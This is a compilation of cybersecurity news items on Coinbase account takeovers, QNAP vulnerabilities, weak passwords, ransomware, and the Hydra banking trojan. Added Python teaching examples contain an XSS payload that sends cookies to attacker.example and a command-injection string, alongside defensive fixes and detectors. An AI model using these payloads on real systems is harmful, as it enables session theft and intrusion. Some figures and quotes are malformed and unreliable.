
Coinbase: Hackers Stole Cryptocurrency From Around 6,000 Customers

Cryptocurrency exchange Coinbase has revealed that attackers stole funds from at least 6,000 of its customers this spring, in part by exploiting a flaw in the exchange's SMS-based two-factor authentication.

Coinbase is the world's second-largest bitcoin exchange, with over 68 million users in more than 100 countries. It disclosed the attacks this week in a data breach notice sent to affected customers, which states: “At least 6,000 Coinbase customers had funds removed from their accounts, including you.”

The account takeovers took place between March 2021 and May 20, 2021. Coinbase believes the attackers ran a large-scale email phishing campaign that tricked a significant number of customers into handing over their email addresses, passwords, and phone numbers.

The attackers, who have not been identified, also gained access to victims' email inboxes using malicious software capable of reading and writing to the inbox once the user granted it permission. A password alone, however, is not enough to get into a Coinbase account.

Coinbase protects accounts with two-factor authentication by default, so logging in requires both the password and a one-time passcode delivered to the customer's phone.

In some cases, however, the attackers were able to obtain that one-time passcode. This affected customers whose second factor was delivered by SMS text message.

A spokesperson for the cryptocurrency exchange told PCMag in a statement, “Once the attackers had compromised the user’s email inbox and their Coinbase credentials, in a small number of cases they were able to use that information to impersonate the user, receive an SMS two-factor authentication code, and gain access to the Coinbase customer account.” 

Coinbase did not explain how the impersonation was carried out. The statement's wording suggests a SIM-swapping attack, in which the attacker tricks the victim's mobile carrier into porting the phone number to a device the attacker controls, after which SMS codes arrive with the attacker rather than the victim.

Coinbase says it has been reimbursing victims for the stolen cryptocurrency, following reports that the company initially did little to help customers hit by the attacks.

A company spokesperson added, “We immediately fixed the flaw and have worked with these customers to regain control of their accounts and reimburse them for the funds they lost.” 

It is also unclear what exactly was fixed. Coinbase is nonetheless urging customers to move away from SMS-based two-factor authentication to stronger alternatives: an authenticator app on a smartphone that generates the one-time passcode, or a hardware security key. Both keep the second factor off the phone number, so neither SIM swapping nor a carrier-side recovery process can be used to intercept it.

QNAP Patched a Flaw that Allowed Attackers to Remotely Execute Malicious Commands

QNAP, a Taiwanese NAS manufacturer, has released security updates for several vulnerabilities that could let attackers remotely inject and execute malicious code and commands on vulnerable NAS devices. Network-attached storage (NAS) appliances are used for file sharing, virtualization, storage management, and surveillance. QNAP is headquartered in the Xizhi District of New Taipei City, Taiwan, and began as a division of IEI Integration Corporation, a Taiwan-based industrial computing company.

Three high-severity stored cross-site scripting (XSS) vulnerabilities (tracked as CVE-2021-34354, CVE-2021-34356, and CVE-2021-34355) affect devices running unpatched Photo Station releases (before 5.4.10, 5.7.13, or 6.0.18), according to QNAP.

QNAP also fixed a stored XSS flaw in Image2PDF affecting versions prior to Image2PDF 2.1.5. A stored XSS vulnerability lets an attacker persist malicious script on the server, where it remains until removed and executes in the browser of every user who loads the affected page.

In a stored attack, the injected script is kept on the target server, for example in a database, a forum post, a visitor log, or a comment field. When a victim requests the affected page, the script is served along with it and runs in the victim's browser, with whatever session the victim holds on the device.
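
To make the mechanism concrete, here is an added example in Python, not code from QNAP or from the original article: a comment store backed by an in-memory SQLite table, rendered once without output encoding and once with it, plus a small HTML-parser check that tells the two apart. The comments, the author names and the attacker-controlled domain attacker.example are constructed for the example.

```python
import html
import sqlite3
from html.parser import HTMLParser

# Constructed sample data: one benign comment and one carrying a script payload.
# The payload is illustrative and is not taken from the QNAP advisories.
SAMPLE_COMMENTS = [
    ("alice", "Nice photo!"),
    ("mallory", "<img src=x onerror=\"fetch('https://attacker.example/?c='+document.cookie)\">"),
]


def build_store():
    """In-memory table standing in for the photo application's comment database.
    Parameterised inserts keep SQL injection out of the picture here."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE comments (author TEXT, body TEXT)")
    db.executemany("INSERT INTO comments VALUES (?, ?)", SAMPLE_COMMENTS)
    return db


def render_vulnerable(db):
    """Stored XSS: the persisted body is concatenated into the page verbatim, so the
    payload executes in the browser of every visitor each time the page is served."""
    rows = db.execute("SELECT author, body FROM comments").fetchall()
    return "<ul>" + "".join(f"<li><b>{a}</b>: {b}</li>" for a, b in rows) + "</ul>"


def render_hardened(db):
    """Fix at the output stage: each untrusted value is HTML-escaped for the text
    context it is placed in. Storing the raw text is fine; emitting it raw is not."""
    rows = db.execute("SELECT author, body FROM comments").fetchall()
    items = "".join(f"<li><b>{html.escape(a)}</b>: {html.escape(b)}</li>" for a, b in rows)
    return "<ul>" + items + "</ul>"


class ActiveContentFinder(HTMLParser):
    """Flags any element carrying an on* event handler, or a <script> tag."""

    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        if tag == "script" or any(name.lower().startswith("on") for name, _ in attrs):
            self.hits.append(tag)


def payload_survives(rendered):
    """True if the rendered page still contains live markup from the payload.
    Escaped text is not parsed as a tag, so the hardened output comes back clean."""
    finder = ActiveContentFinder()
    finder.feed(rendered)
    return bool(finder.hits)


if __name__ == "__main__":
    store = build_store()
    print("vulnerable:", render_vulnerable(store))
    print("hardened:  ", render_hardened(store))
```

The escaping belongs at the point where data meets HTML, not at input time: the same stored string may later be emitted into a JavaScript string, a URL or an attribute, each of which needs its own encoding.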

A command injection bug (CVE-2021-34352) in the QVR IP video surveillance software on some end-of-life (EOL) QNAP devices was also fixed. It allowed attackers to run arbitrary commands, and successful exploitation could result in a complete takeover of the NAS.

In April, QNAP patched a command injection vulnerability (CVE-2020-2509) in its QTS and QuTS hero NAS operating systems. A second critical flaw (CVE-2020-36195), affecting any QNAP NAS running the Multimedia Console or the Media Streaming add-on, was fixed in the same batch of firmware updates.
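
The command injection class behind these CVEs is simplest to see side by side. The following is an added Python example, not QNAP's code: a stand-in for a NAS diagnostic endpoint that pings a user-supplied host, written three ways. `echo` is substituted for the real binary so it runs anywhere, the hostname pattern is this example's own allow-list, and the injection string is constructed.

```python
import ipaddress
import re
import subprocess

# Allow-list for hostnames: letters, digits, dots and hyphens only. Shell
# metacharacters (';', '|', '$', backticks, whitespace) never match.
HOSTNAME_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9.-]{0,252}")


def validate_target(target):
    """Accept an IP literal or a plain hostname; reject everything else."""
    try:
        ipaddress.ip_address(target)
        return target
    except ValueError:
        pass
    if HOSTNAME_RE.fullmatch(target):
        return target
    raise ValueError(f"rejected target: {target!r}")


def run_vulnerable(target):
    """The bug class: untrusted input spliced into a shell command string.
    A second command after ';' runs with the web process's privileges."""
    completed = subprocess.run(f"echo pinging {target}", shell=True,
                               capture_output=True, text=True)
    return completed.stdout


def run_no_shell(target):
    """Half a fix: an argument vector with no shell, so metacharacters are inert,
    but the attacker's text still reaches the program as part of one argument."""
    completed = subprocess.run(["echo", "pinging", target],
                               capture_output=True, text=True)
    return completed.stdout


def run_hardened(target):
    """Both controls: validate against the allow-list, then exec without a shell."""
    return run_no_shell(validate_target(target))


if __name__ == "__main__":
    evil = "127.0.0.1; echo INJECTED"
    print(run_vulnerable(evil), end="")
    print(run_no_shell(evil), end="")
    try:
        run_hardened(evil)
    except ValueError as exc:
        print(exc)
```

The second variant matters for programs like `ping` that accept option flags: with no validation, a target of `-c 1000000` is still passed through, so the argument-vector form is necessary but not sufficient.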

 “Both vulnerabilities are simple to exploit if you know the exact technical details,” said Yaniv Puyeski, a security researcher of SAM Seamless Network. 

The critical pre-authentication flaws, which require only network access to the vulnerable services, highlight an insecure but all too common way of deploying the devices, according to Puyeski. “Unfortunately, a lot of QNAP owners expose their device to the internet through port forwarding which puts them at very high risk to be hacked,” he explained.

Mozilla: Many Breached Accounts Used Superhero and Disney Princess Names as Passwords

A password is to an online account what a key is to a house: it is what stands between an outsider and the personal information stored there, so it needs to be strong.

According to a new Mozilla blog post, however, superhero-themed passwords are turning up in data breaches more and more often. Mozilla's analysis of the haveibeenpwned.com dataset found that many of the most frequently seen passwords in breach data are the names of superheroes or Disney princesses. Passwords this guessable make it trivial for attackers to take over an account.

The analysis found 368,397 breached accounts using Superman as the password, 226,327 using Batman, and 160,030 using Spider-Man, with thousands more using Wolverine and Ironman. On the Disney side, research from 2019 found 192,023 breached accounts using Jasmine and 49,763 using Aurora.

A further 484,4765 breached accounts used ‘princess’ as the password, and some Disney+ accounts used ‘Disney’. Passwords like these are a large part of why account takeovers succeed so easily.

With compromised credentials circulating ever more freely on the dark web, a growing number of businesses are turning to passwordless sign-in. Microsoft has extended its passwordless option from Azure Active Directory (AAD) commercial customers to consumer Microsoft accounts on Windows 10 and Windows 11 PCs.

Almost all of Microsoft's own employees are passwordless, according to Vasu Jakkal, corporate vice president of Microsoft's Security, Compliance, Identity, and Management group.

"We use Windows Hello and biometrics. Microsoft already has 200 million passwords fewer customers across consumer and enterprise," Jakkal said. "We are going completely passwordless for Microsoft accounts. So you don't need a password at all," he further added. 

Reusing passwords is common because it is convenient and many people do not appreciate the consequences, but it is dangerous: credential stuffing attacks automate login attempts across many sites using the email address and password pairs leaked in earlier breaches, so one compromised site exposes every account that shares the password. Use a unique, non-obvious password for every account (a password manager makes this practical) and change a password promptly whenever it is known to have been exposed.
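
One way to turn the Mozilla findings into a control at sign-up time, as an added Python example that is not from Mozilla's post: a password check that rejects the themed names above and looks the candidate up in breach data using the k-anonymity range scheme of the haveibeenpwned.com Pwned Passwords API, where only the first five hex characters of the SHA-1 hash ever leave the client. The breach corpus and its counts are constructed for this example (a handful of entries standing in for hundreds of millions), and `range_lookup` simulates the HTTP call so the code runs offline.

```python
import hashlib
import re

# Constructed breached-password corpus with illustrative counts. The real corpus
# is hundreds of millions of entries; this stands in for it offline.
CONSTRUCTED_CORPUS = {
    "superman": 368397, "batman": 226327, "spiderman": 160030,
    "princess": 484765, "jasmine": 192023, "aurora": 49763,
    "disney": 8000, "wolverine": 12000, "ironman": 9000,
}

# Names the post calls out; matched after normalisation so decorations don't help.
THEMED_NAMES = {"superman", "batman", "spiderman", "wolverine", "ironman",
                "jasmine", "aurora", "princess", "disney"}


def sha1_hex(password):
    return hashlib.sha1(password.encode("utf-8")).hexdigest().upper()


def build_range_index(corpus):
    """Bucket SHA-1 hashes by their first five hex characters, the shape of the
    Pwned Passwords range API (one bucket per /range/<prefix> request)."""
    index = {}
    for password, count in corpus.items():
        digest = sha1_hex(password)
        index.setdefault(digest[:5], []).append(f"{digest[5:]}:{count}")
    return index


def range_lookup(prefix, index):
    """Stand-in for GET https://api.pwnedpasswords.com/range/<prefix>, which returns
    newline-separated 'SUFFIX:COUNT' lines for every hash sharing that prefix."""
    return "\n".join(index.get(prefix, []))


def breach_count(password, index):
    """k-anonymity check: the 5-character prefix is all that is sent; the rest of
    the hash is compared locally against the returned bucket."""
    digest = sha1_hex(password)
    prefix, suffix = digest[:5], digest[5:]
    for line in range_lookup(prefix, index).splitlines():
        candidate, count = line.split(":")
        if candidate == suffix:
            return int(count)
    return 0


def normalise(password):
    """Strip case, digits and symbols so 'Batman2021!' is recognised as 'batman'."""
    return re.sub(r"[^a-z]", "", password.lower())


def check_password(password, index):
    """Return the reasons a candidate should be rejected (an empty list means accept)."""
    problems = []
    if len(password) < 12:
        problems.append("shorter than 12 characters")
    if normalise(password) in THEMED_NAMES:
        problems.append("superhero or Disney-princess name")
    seen = breach_count(password, index)
    if seen:
        problems.append(f"appears {seen} times in breach data")
    return problems


RANGE_INDEX = build_range_index(CONSTRUCTED_CORPUS)

if __name__ == "__main__":
    for candidate in ("superman", "Batman2021!", "correct horse battery staple"):
        print(candidate, "->", check_password(candidate, RANGE_INDEX) or "ok")
```

Against the real service the request is a plain HTTPS GET of the five-character prefix; the server never learns the full hash, which is what makes it safe to query with a user's actual password at registration time.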

Ransomware Attacks At An All Time High, Reports Palo Alto

Ransomware and ransomware-as-a-service (RaaS) attacks are at an all-time high and have dominated the security community's attention for the last few months, as threat actors relentlessly target businesses, corporations, and email accounts for financial gain. Business email compromise (BEC) and email account compromise (EAC) scams have caused the most damage, according to recent cybersecurity reports.

The FBI found that BEC and EAC accounted for at least $1.86 billion in losses in 2020 in the United States alone, a 5% increase over 2019. BEC and EAC made up 45% of reported cybersecurity incidents in the US, and 11% of the victims were over the age of 60.

The largest reported ransomware payment to date is roughly $40 million. Unit 42 reports: "When scammers use this tactic, it usually starts with a baited email enticing the recipient to open the attachment or click on the link to a webpage.

The emails usually focus on some segment of business operations (including finance, human resources, logistics and general office operations) and point to an attachment or link related to topics requiring user action." Experts say the average ransomware demand in 2020 was $847,344, while the average ransom actually paid was $312,493.

So far in 2021 the average ransom paid has risen 82%, to $570,000. These averages cover only direct ransom payments: they exclude revenue lost while an organization operates in a degraded state during an attack, the cost of the resources consumed by the response, and, above all, attacks that were never reported. Whether a company reports an incident at all depends on the nature and impact of the attack.

That underreporting makes it harder for federal and cybersecurity agencies to gauge the full impact of these attacks. BEC, EAC, and ransomware attacks share one prerequisite: the attacker needs access to the victim's accounts or networks.

"The lucrative nature of BEC/EAC scams drives criminals to continually modify and upgrade their tactics to defeat protections. One of the newer techniques integrates spear phishing, custom webpages and the complex cloud single sign-on ecosystem to trick users into unwittingly divulging their credentials," reports Unit 42 of palo alto networks.

Private Details of Thousands of Customers Leaked in Hawaii Firm Ransomware Attack

Hawaii Payroll Services, a Hawaii payroll processing firm, has confirmed a data breach affecting nearly 4,500 customers. The company suffered a ransomware attack in mid-February that exposed Social Security numbers, dates of birth, full names, and bank details of its clients.

“The company’s servers were breached by someone able to gain access to Hawaii Payroll's systems through a compromised client account and execute a privilege escalation attack that enabled the intruder to disable and remove security software and encrypt all data residing in Hawaii Payroll's servers," according to the company.

To contain the incident, the firm suspended all remote client access and asked the third-party vendor that manages its IT operations to determine the extent of the breach. It filed a complaint with the FBI's Honolulu field office and notified state regulators and the credit reporting agencies.

In May, the company sent letters to customers potentially affected by the attack, but some were returned unopened, and it is still trying to regain access to many of the files the attacker encrypted, company owner Michelle Wells-Nagamine told the Honolulu Star-Advertiser.

So far there have been no reports of the data appearing on the dark web. "We got everything put back in for this year, and we marched forward. That's all I can do," Wells-Nagamine said, adding that the company has retained "expert forensic assistance to further investigate and remediate the situation and to suggest security improvements."

According to the state Department of Commerce and Consumer Affairs, Hawaii Payroll Services, established in July 2003, is a domestic limited liability company offering payroll processing, 401(k) reporting, and payroll tax filing. It serves more than 120 local companies, including Rainforest at Kilohana Square, Diamond Bakery, Yummy's BBQ, and Jean's Warehouse.

According to the U.S. Department of Justice, reported cybercrime rose by nearly 70% in 2020, from 467,361 complaints and almost $3.5 billion in losses to U.S. citizens in 2019 to 791,790 complaints and $4.2 billion in losses in 2020. The FBI's Internet Crime Complaint Center also received 2,474 ransomware reports last year, accounting for over $29.1 million in losses.

That dollar figure does not include estimates of lost business, time, wages, files, or equipment, or the cost of third-party remediation services bought by victims. Some victims never report their losses to the federal government at all, so the overall ransomware loss figure is artificially low.

NSA’s Cyber Chief Warned About the Increasing Cyber Threat

On Wednesday, September 29, the head of the National Security Agency's cybersecurity directorate warned of the growing number of cyber threat actors and the threats they pose.

Rob Joyce, Director of the NSA Cybersecurity Directorate, told the Aspen Cyber Summit in Colorado that nearly every government in the world now has a cyber exploitation program.

Joyce previously served as special assistant to the president and cybersecurity coordinator on the National Security Council in 2018, among other roles at the nation's leading signals intelligence agency.

“The vast majority of those are used for espionage and intelligence purposes, but… there is interest in dabbling in offensive cyber and outcomes. The difference between the top of the list and the bottom of the list, usually, is scale,” stated Joyce. 

There are some “high-end, sophisticated small actors, but they’re confined to whatever that national interest is that they’re aimed at so we see less of them.” 

Joyce also gave his assessment of the so-called "Big Four", the foreign states that have historically been America's main adversaries in cyberspace: Russia, China, Iran, and North Korea.

On Russia, he described it as the disruptive force: rather than building itself up, it often tries to pull others down. Russia remains extremely active in intelligence collection against critical infrastructure and other nations, and it aggressively uses disruptive operations around the world. NSA has seen indications of pre-positioning in U.S. critical infrastructure, something Joyce said must be pushed back on as simply not permissible.

On China, he said the scale and scope are off the charts, with the number of Chinese cyber actors growing around the world. NSA's regard for their capability has risen compared with four or five years ago: they have always been broad, loud, and noisy, but with such a vast resource base, the elite within that group are genuinely elite.

“The high end of the Chinese sophistication is really good. We’ve got to continue to understand, disrupt and then find ways across the whole of that technology to kind of push back… Yes, defense is really important, but you also have to work to disrupt so that’s the continuous engagement strategy out of the [Defense Department] and the idea that we got to put sand and friction in their operations, so they don’t get just free shots on goal,” he added. 

On Iran, Joyce said it remains active in cyber operations; it was the first nation anyone thought of during the bank distributed denial-of-service campaigns and the Shamoon wiper attacks. What NSA observes now is a focus largely on regional matters, with a narrower reach than before. Iran remains capable, however, in part because its decision-making is less restrained, and it does not always appreciate how far its actions go toward provoking the wider international community.

Finally, North Korea remains intensely focused on generating revenue for the regime. Heavy sanctions have not changed its behaviour; instead it has had to develop ways to raise cash, and it has learned that stealing bitcoin is easier than robbing the Bangladesh Bank. It has not pursued the largest banks as hard because it can make the money it needs in the cryptocurrency world.

“The commercial firms were dealing with a lot of North Korean issues back when the [Covid-19] vaccine was an issue; they were going after the intellectual property of vaccine makers. So, still active, still a threat, very capable but mostly focused on crypto exchanges and creating money,” he added.

Neiman Marcus Announces Data Breach Affecting Millions

American luxury retailer Neiman Marcus Group (NMG) has disclosed a major data breach affecting around 4.6 million customers. In a press release, the company said it has begun notifying those customers that personal information associated with their online accounts may have been accessed by an unauthorized third party in May 2020.

The breach occurred in May of last year, according to the company, when “an unauthorized party” obtained personal information from some Neiman Marcus customers' online accounts.

Neiman Marcus has notified law enforcement and engaged the cybersecurity firm Mandiant to investigate further.

The stolen information includes names; usernames and passwords for Neiman Marcus online accounts; addresses and contact details; payment card numbers and expiration dates (but not CVV codes); Neiman Marcus virtual gift card numbers (without PINs); and the security questions on Neiman Marcus online accounts. Around 3.1 million payment and virtual gift cards were affected, although roughly 85 percent of them were expired or otherwise invalid.

Customer data of Bergdorf Goodman and Horchow, which are also part of the Neiman Marcus Group, was not affected. The company has advised customers to change their account passwords and to report any suspicious activity on their accounts.

"At Neiman Marcus Group, customers are our top priority," CEO Geoffroy van Raemdonck said in a statement Friday. "We are working hard to support our customers and answer questions about their online accounts. We will continue to take actions to enhance our system security and safeguard information."


Hydra Malware Targets Customers of Germany's Second-Largest Bank

The Hydra banking trojan has resurfaced to target users of European online banking platforms, in particular customers of Commerzbank, Germany's second-largest financial institution.

MalwareHunterTeam spotted the two-year-old trojan in a new distribution campaign aimed at German users: a malicious APK named 'Commerzbank Security' that mimics the icon of the legitimate banking app.

That caught the attention of researchers at Cyble, who analysed the sample in depth and found a sophisticated credential-stealing tool that requests an extensive set of permissions.

According to Cyble, Hydra is still evolving: the variants used in the latest campaign include TeamViewer functionality, similar to the S.O.V.A. Android banking trojan, use several encryption methods to evade detection, and communicate over Tor.

The latest version can also disable Google Play Protect. The malware requests two particularly dangerous permissions, BIND_ACCESSIBILITY_SERVICE and BIND_DEVICE_ADMIN, according to the researchers.

The Accessibility Service is a background service that assists users with disabilities; an app declares the BIND_ACCESSIBILITY_SERVICE permission on its service so that the system can bind to it and feed it the contents of the screen and the user's interactions.

The analysis published by Cyble states, “Malware authors abuse this service to intercept and monitor all activities happening on the device’s screen. For example, using Accessibility Service, malware authors can intercept the credentials entered on another app.” 

“BIND_DEVICE_ADMIN is a permission that allows fake apps to get admin privileges on the infected device. Hydra can abuse this permission to lock the device, modify or reset the screen lock PIN, etc.” 

The malware also requests permissions that let it read SMS content, send SMS messages, make calls, change device settings, spy on user activity, and send bulk SMS to the victim's contacts:
  • CHANGE_WIFI_STATE: modify the device's Wi-Fi settings
  • READ_CONTACTS: read the phone's contacts
  • READ_EXTERNAL_STORAGE: read the device's external storage
  • WRITE_EXTERNAL_STORAGE: modify the device's external storage
  • READ_PHONE_STATE: read phone state and device information
  • CALL_PHONE: place calls without user intervention
  • READ_SMS: read the SMS messages stored on the device
  • REQUEST_INSTALL_PACKAGES: prompt installation of additional packages
  • SEND_SMS: send SMS messages
  • SYSTEM_ALERT_WINDOW: draw windows over other apps
Code analysis shows that many classes referenced by the APK are absent from the file as shipped: the malicious code is unpacked at runtime by a custom packer, which defeats signature-based detection of the APK on disk.
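
The permission list above is what an analyst checks first when triaging a suspicious APK. As an added example (not Cyble's tooling), the following Python script scans a decoded AndroidManifest.xml, as apktool produces from an APK, for those permissions and for services or receivers gated by BIND_ACCESSIBILITY_SERVICE or BIND_DEVICE_ADMIN, and scores the result. The manifest, the package name, the component names and the weights are constructed for the example.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"

# Permissions from the list above, each with the abuse it enables for a banking trojan.
RISKY_PERMISSIONS = {
    "android.permission.READ_SMS": "read SMS one-time codes",
    "android.permission.SEND_SMS": "spread via SMS to the victim's contacts",
    "android.permission.CALL_PHONE": "place calls without user interaction",
    "android.permission.READ_CONTACTS": "harvest contacts for SMS spam",
    "android.permission.READ_PHONE_STATE": "fingerprint the device",
    "android.permission.CHANGE_WIFI_STATE": "alter Wi-Fi settings",
    "android.permission.READ_EXTERNAL_STORAGE": "read shared storage",
    "android.permission.WRITE_EXTERNAL_STORAGE": "write shared storage",
    "android.permission.REQUEST_INSTALL_PACKAGES": "sideload further payloads",
    "android.permission.SYSTEM_ALERT_WINDOW": "draw overlays on top of banking apps",
}
# Declared on components (android:permission=...) rather than in <uses-permission>.
RISKY_BINDINGS = {
    "android.permission.BIND_ACCESSIBILITY_SERVICE": "read screen contents and input of other apps",
    "android.permission.BIND_DEVICE_ADMIN": "lock the device, reset the PIN, resist uninstall",
}

# Constructed decoded manifest; package, class names and label are invented.
CONSTRUCTED_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.fakebank">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <uses-permission android:name="android.permission.SEND_SMS"/>
  <uses-permission android:name="android.permission.READ_CONTACTS"/>
  <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW"/>
  <uses-permission android:name="android.permission.REQUEST_INSTALL_PACKAGES"/>
  <application android:label="Commerzbank Security">
    <service android:name=".AccService"
             android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE">
      <intent-filter>
        <action android:name="android.accessibilityservice.AccessibilityService"/>
      </intent-filter>
    </service>
    <receiver android:name=".AdminReceiver"
              android:permission="android.permission.BIND_DEVICE_ADMIN">
      <intent-filter>
        <action android:name="android.app.action.DEVICE_ADMIN_ENABLED"/>
      </intent-filter>
    </receiver>
  </application>
</manifest>
"""


def triage_manifest(xml_text):
    """Return (permission, why-it-matters) pairs for every risky declaration found."""
    root = ET.fromstring(xml_text)
    findings = []
    for node in root.iter("uses-permission"):
        name = node.get(ANDROID_NS + "name")
        if name in RISKY_PERMISSIONS:
            findings.append((name, RISKY_PERMISSIONS[name]))
    for node in root.iter():  # any component may carry android:permission
        perm = node.get(ANDROID_NS + "permission")
        if perm in RISKY_BINDINGS:
            findings.append((perm, RISKY_BINDINGS[perm]))
    return findings


def risk_score(findings):
    """One point per distinct risky permission; the accessibility plus device-admin
    pairing Cyble highlights for Hydra adds a constructed weight of five."""
    names = {name for name, _ in findings}
    score = len(names)
    if {"android.permission.BIND_ACCESSIBILITY_SERVICE",
        "android.permission.BIND_DEVICE_ADMIN"} <= names:
        score += 5
    return score


if __name__ == "__main__":
    hits = triage_manifest(CONSTRUCTED_MANIFEST)
    for name, why in hits:
        print(f"{name}: {why}")
    print("score:", risk_score(hits))
```

The same pass over a legitimate banking app's manifest would typically show INTERNET plus a camera or biometric permission and neither binding permission, which is the contrast the score is meant to surface.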

Cyble concluded, “We have also observed that the malware authors of Hydra are incorporating new technology to steal information and money from its victims. Alongside these features, the recent trojans have incorporated sophisticated features. We observed the new variants have TeamViewer or VNC functionality and TOR for communication, which shows that TAs are enhancing their TTPs.” 

“Based on this pattern that we have observed, malware authors are constantly adding new features to the banking trojans to evade detection by security software and to entice cybercriminals to buy the malware. To protect themselves from these threats, users should only install applications from the official Google Play Store.” 

18 million potential targets

Commerzbank has 13 million customers in Germany and another 5 million in Central and Eastern Europe, a pool of 18 million potential targets, and audience size is always a factor for malware distributors.

Threat actors typically use SMS, social media, and forum posts to steer potential victims in Germany to malicious landing pages that serve the APK.

Anyone who believes they have installed the app should remove it with a reputable vendor's security tool and then factory-reset the device. Because the app holds device administrator rights, it may first have to be deactivated as a device administrator in the system settings before Android will allow it to be uninstalled.

Thousands of Coinbase Clients were Robbed due to an MFA Flaw

A threat actor stole cryptocurrency from 6,000 Coinbase customers after exploiting a flaw in the exchange's SMS-based multi-factor authentication, the company says. According to a notice sent to affected customers this week, the campaign to break into customer accounts ran between March and May 20, 2021.

To get in, the attackers needed to know the victim's email address, password, and phone number, and also to have access to the victim's email account, according to the US-based exchange, which has roughly 68 million customers in more than 100 countries. How the attackers obtained that information is unclear.

"In this incident, for customers who use SMS texts for two-factor authentication, the third party took advantage of a flaw in Coinbase's SMS Account Recovery process in order to receive an SMS two-factor authentication token and gain access to your account," Coinbase told customers in electronic notifications. 

Customers' personal information was exposed as well, the notification says, "including their complete name, email address, home address, date of birth, IP addresses for account activity, transaction history, account holdings, and balances."

In other words, a flaw in the SMS account recovery process let the attackers obtain the SMS two-factor authentication token needed to sign in to an account they otherwise could not access. Coinbase says it updated its "SMS Account Recovery protocols" once it learned of the incident, closing this route to bypassing SMS multi-factor authentication.

Because the flaw allowed access to accounts that customers had reason to believe were secure, the exchange is crediting affected accounts with the value of what was taken.

"We will be depositing funds into your account equal to the value of the currency improperly removed from your account at the time of the incident. Some customers have already been reimbursed -- we will ensure all customers affected receive the full value of what you lost," promised Coinbase. It's unclear whether Coinbase will credit hacked users with the stolen cryptocurrency or fiat currency. If fiat currency is used, it may result in a taxable event for the victims if their profits increase. 

In its account security guide, Coinbase recommends multi-factor authentication (MFA) with a hardware security key first, time-based one-time passwords (TOTP) from an authenticator app next, and SMS text messages only as a last resort.

JVCKenwood Company Suffers Ransomware Attacks, Hackers Demand $7 Million Ransom

JVCKenwood has been hit by a Conti ransomware attack; the attackers claim to have stolen 1.7 TB of data and are demanding a $7 million ransom. JVCKenwood is a Japanese multinational electronics company with around 17,000 employees and revenue of $2.45 billion in 2021. It is known for its Victor, Kenwood, and JVC brands, which make car and home audio equipment, healthcare and radio equipment, portable power stations, and professional and in-vehicle cameras.
Earlier this week, JVCKenwood revealed that servers belonging to its European sales companies were compromised on September 22 and that the attackers may have had access to data while the attack was under way. The company said it detected unauthorized access in September 2021 to servers operated by JVCKenwood Group's sales organizations in Europe, and that data may have been leaked by the third party that gained that access.

A full investigation is being conducted by external specialist firms together with the relevant authorities; no data leak has been confirmed to date, and further details will be published on the company website as they become available. Separately, a source shared the ransom note from the Conti sample used in the JVCKenwood attack. In the negotiation, the gang claims to have stolen 1.5 TB of files and is demanding $7 million in exchange for a decryption key and a promise not to leak the data. As proof, the attackers shared a file containing scanned copies of employees' passports.

Since that proof was provided, the JVCKenwood representative has not contacted the attackers again, which suggests the company does not intend to pay. "Conti is a ransomware family believed to be operated by the TrickBot threat actor group and is commonly installed after networks are compromised by the TrickBot, BazarBackdoor, and Anchor trojans. The ransomware gang has been responsible for a wide range of attacks over the years, including high-profile attacks against the City of Tulsa, Ireland's Health Service Executive (HSE), Advantech, and numerous health care organizations," reports BleepingComputer.

Ransomware Attack on Hospital Associated with Baby’s Death

A baby born in an Alabama hospital during a 2019 ransomware attack later died of severe brain injury, and a lawsuit alleges that the degraded care caused by the attack was to blame. The hospital will defend itself in court in November against the claim that the cyberattack led to the baby's death.

The filing is the first credible public allegation that anyone was killed, at least in part, by attackers who remotely shut down a hospital's computers for extortion, a practice that is steadily growing in cybercrime.

The lawsuit, brought by the baby's mother, Teiranni Kidd, was first reported by The Wall Street Journal. It alleges that Springhill Medical Center did not tell her that its computers were down because of a cyberattack, and that she received severely reduced care when she came in to deliver her daughter.

In 2019, Springhill said it had suffered a "network security incident," a common euphemism for a cyberattack. At the time it told local news station WKRG that it was seeing its normal volume of patients, although some were turned away because of the ransomware attack.

Kidd first sued the hospital in January 2020 and amended the complaint after her daughter died in July. The hospital did not respond to a request for comment, and Kidd declined to speak because the case is ongoing.

The filings say that Kidd was not told about the cyberattack when she arrived to give birth to her daughter, and that doctors and nurses then missed several key tests which would have shown that the umbilical cord was wrapped around the baby's neck. The resulting brain damage led to the baby's death nine months later.

“It’s an awful thing, but we’ve been expecting this for years to happen, because when things go wrong, eventually somebody’s going to die,” Liska said. 

It is not the first time a death has been blamed on ransomware, but it is the first such case to reach a court. The closest precedent came in September of last year, when a patient in Germany died after the ambulance carrying them was diverted because a ransomware attack had crippled the hospital; German police opened a negligent homicide investigation and said the attackers could be held liable.

Springhill has declined to name the ransomware group behind the July 2019 attack.